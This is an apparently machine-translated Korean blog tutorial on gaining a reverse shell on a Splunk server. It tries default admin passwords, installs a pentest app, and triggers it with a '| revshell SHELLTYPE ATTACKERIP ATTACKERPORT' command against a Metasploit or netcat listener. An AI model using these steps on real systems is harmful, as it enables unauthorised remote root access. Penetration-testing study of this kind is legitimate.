Splunk 에 사용자 정의 적용 반사 셸 설치
Splunk 에 대한 접근 권한 을 얻 으 려 면 비밀 번 호 를 맞 추거 나 이전에 얻 은 비밀 번 호 를 다시 사용 해서 로그 인 을 시도 할 수 있 습 니 다."admin: admin"이나 "admin: changeme"을 사용 하여 관리 콘 솔 에 로그 인 한 적 이 있 습 니 다.
Splunk app 은 많은 사람들 이 모 를 것 이 라 고 믿 습 니 다. 바로 Splunk app 을 사용 하여 python 코드 를 실행 하 는 것 입 니 다.TBG Security 팀 은 침투 테스트 에 사용 할 수 있 는 Splunk 앱 을 개발 했다.이 앱 은 이미 2017 년 에 출시 됐다.그럼 에 도 불구 하고 나 는 이 도 구 를 아 는 사람 이 별로 없다 고 생각한다. 나 는 그것 이 더 많은 사람들의 관심 을 받 아야 한다 고 생각한다.
공구 의 사용 은 매우 간단 하 다.우선, Splunk Shells GitHub 페이지 에서 최신 버 전 을 다운로드 하면 됩 니 다.
Splunk 관리 콘 솔 에 로그 인 한 뒤 '앱' 표시 줄 과 '앱 관리' 를 차례로 눌 렀 다.
Manage Apps
Apps 패 널 에 들 어간 후 "Install app from file"을 누 르 십시오.
Install app from file
browse 단 추 를 누 르 고 tar. gz 파일 을 업로드 합 니 다.
tar. gz 파일 업로드
업로드 에 성공 하면 Splunk 를 다시 시작 해 야 합 니 다.재 부팅 후 Splunk 에 로그 인하 고 'Apps' 인터페이스 로 돌아 갑 니 다.permissions 를 누 르 십시오. "Sharing"옵션 을 보 았 을 때 "All Apps"단 추 를 누 르 십시오.
"All Apps"체크 단 추 를 누 르 십시오.
app 을 설치 한 후 마지막 으로 해 야 할 일 은 셸 을 가 져 오 는 것 입 니 다.Metasploit 를 통 해 만 든 표준 역방향 셸 을 선택 한 옵션 이 있 습 니 다.
표준 역방향 셸
MSF handler (또는 netcat listener) 가 시작 되 고 실 행 된 후 다음 명령 을 입력 하여 app 을 촉발 합 니 다.
| revshell SHELLTYPE ATTACKERIP ATTACKERPORT 에서 역방향 셸 을 가 져 옵 니 다.
이것 은 즉시 app 을 실행 하고 역방향 셸 을 가 져 옵 니 다.
이상 의 테스트 는 Splunk 7.0 에서 진행 되 었 습 니 다. 모든 것 이 순 조 롭 습 니 다!Splunk 는 보통 루트 로 실행 되 는데 이것 은 공격 자 에 게 호스트 의 다른 정 보 를 매 거 할 수 있 는 기 회 를 제공 합 니 다. 데이터베이스 범위 에 만 국한 되 는 것 이 아 닙 니 다.
업데이트:
이상 의 방법 외 에 도 Tevora 의 splunk 를 사용 할 수 있 습 니 다.pentest_app
http://www.45zq.cn/
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
다양한 언어의 JSONJSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.